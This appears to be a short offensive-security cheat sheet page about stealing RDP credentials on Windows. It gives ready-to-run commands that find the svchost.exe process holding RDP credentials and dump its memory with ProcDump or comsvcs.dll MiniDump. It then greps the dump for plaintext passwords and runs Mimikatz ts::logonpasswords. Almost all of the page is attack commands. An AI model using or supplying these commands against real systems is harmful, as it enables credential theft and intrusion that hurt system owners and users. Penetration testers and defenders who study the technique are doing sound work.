svchost.exe

Locate the svchost.exe process that's holding RDP creds:

Cmd > tasklist /M:rdpcorets.dll

Use ProcDump or comsvc.dll to dump process memory:

Cmd > .\procdump64.exe -accepteula -64 -ma <PROCESS_PID> svchost.dmp
Cmd > rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump <PROCESS_PID> C:\Windows\Temp\svchost.dmp full

Grep for plaintext passwords:

$ strings -el svchost.dmp | grep <USERNAME> -C1

Mimikatz

Cmd > .\mimikatz.exe "privilege::debug" "token::elevate" "log out.txt" "ts::logonpasswords" "exit"

Last updated